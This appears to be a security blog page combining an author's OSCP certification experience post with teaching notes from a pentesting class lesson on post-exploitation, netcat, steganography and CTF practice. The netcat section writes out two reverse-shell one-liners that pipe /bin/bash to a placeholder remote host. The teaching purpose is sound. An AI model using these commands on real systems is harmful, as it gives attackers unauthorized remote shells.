**Update (11/4/2016) – added a few bits back in from this post
A few weeks ago, I “tried harder” and was awarded the Offensive Security Certified Professional (OSCP) certification.
As many people before me have done, I decided I’d post a little writeup of my experience with the Pentesting With Kali (PWK) online training and taking the OSCP exam (twice).
As you probably know by now, the OSCP is Offensive Security’s certification for penetration testing using the Linux distribution they maintain, Kali Linux. The accompanying course, Pentesting With Kali (PWK), gets you a PDF lab guide and a series of instruction videos covering the different topics of the guide, from basic network enumeration to writing buffer overflow exploits. You’re also purchasing VPN access to their hands-on lab environment of dozens of different vulnerable hosts for you to probe and exploit. To attain the OSCP certification, you take a hands-on exam in which you’re given VPN access to a special exam network and are alotted 24 hours to compromise as many systems as possible, plus an additional 24 hours to write up and submit your exam penetration test report.
I signed up for the 90-day course, bought a one-month extension after I ran out of time (mostly for going back over machines to write the huge lab report…more on that later), I bombed my first attempt at the exam, purchased a two-week extension in order to bone up on some stuff and get a retest attempt, then passed it on my second try.
The Cost, Signing Up, and Getting your Employer to Pay For It
I’ve wanted to take OffSec’s training for a long time and I should’ve just sucked it up, ponied up the money, and took it years ago. I fought for over a year at my previous employer to get them to finance it. I was ready to give up arguing with them and buy it myself before I landed in my current job. Thankfully, where I work now has a healthy training budget for its pentesters and all I had to do was put it on the corporate card. Continue reading
Lesson 7 – Post-Exploitation
- Netcat is a tool you will need to get very comfortable with as a pentester. Netcat is a simple but powerful utility that will allow you to listen on or transmit data over TCP or UDP ports. It’s built into almost every Linux or Unix OS (including OS X) and versions are availble for Windows and other OS’s too.
- Some of the popular clones of netcat include ncat (which is part of the Nmap Project and comes bundled with it), socat, CryptCat (which can SSL-encrypt your traffic), and many others
- Steganography is one of those things you learn in security classes and is fun for hacker CTFs…but I’m not really sure how much it gets used by real attackers. Or even pentesters on engagements, for that matter.
- Stego-only attack: you only have the medium with the hidden data in it
- Known-cover attack: you have a copy of the original medium BEFORE data was hidden in it and a copy of it AFTER data is hidden
- Known-message attack: you have the medium with hidden data in it and you know what the hidden message is (can determine the steg algorithm with this info)
- Known-stego attack: you know the steg method used and you have access to the original and modified medium
- Chosen-stego attack: you have access to different steg tools and you try each them and look for similarities to determine which method was used for the file you’re analysing
- Chosen-message attack: similar to the above, but using the same message in different tools to look for patterns or signatures
- The process might get far along, but eventually the program being used to trash the disk will delete itself and stall out, so there will still be something for forensic investigators to pick at…though who knows just what will remain.
- Also, besides the netcat man page, there are some good recipes buried in the /usr/share/doc/netcat-traditional/ directory on Kali. Check out README.Debian and README.gz. Also, there are some very interesting shell scripts that use netcat to do everything from IRC to acting as a crude web server down in the examples subdirectory.
- Besides all the different variants, there are two mainstream versions of netcat: netcat-traditional and netcat-openbsd. The netcat-openbsd is the most common version you’ll find that comes installed on Debian, Ubuntu, Redhat, and various other Linux distributions. The main difference is that the OpenBSD variant has had the “-e” option removed, as a measure to prevent hackers leaving backdoors.
- Fortunately, there are two different options for sending out a reverse shell without having to use the “-e” flag:
1.) mknod backpipe p && nc <remote server> <port> 0<backpipe | /bin/bash 1>backpipe
2.) mkfifo pipe && nc <remote serve> <port> < pipe | /bin/bash &> pipe <——– this one is better, because it will also pipe stderr to you (so you can see error messages)
This is the point in the class where I would start doing actual CTF challenges with the students. What I usually did was create several VMs on the class server (I didn’t need much horsepower; an old laptop running Linux Mint with about 4GB of RAM sufficed just fine) and assign one to each student for them to hack. I had pretty small classes, so I this was doable. I would give them hints, answer questions, guide them in the right direction, get them to help each other out, etc. until they finally solved it.
But for you reading along at home, you should now know enough to try to tackle some of these CTF VMs yourself. Here are the first few I started them out on:
You can easily download the ISO images and run them in VMware or VirtualBox. I urge to try to solve them on your own. The De-ICE ones do have a hint page in the target machine’s website. If you get really desperate, you can always look at the walkthroughs on their respective VulnHub pages.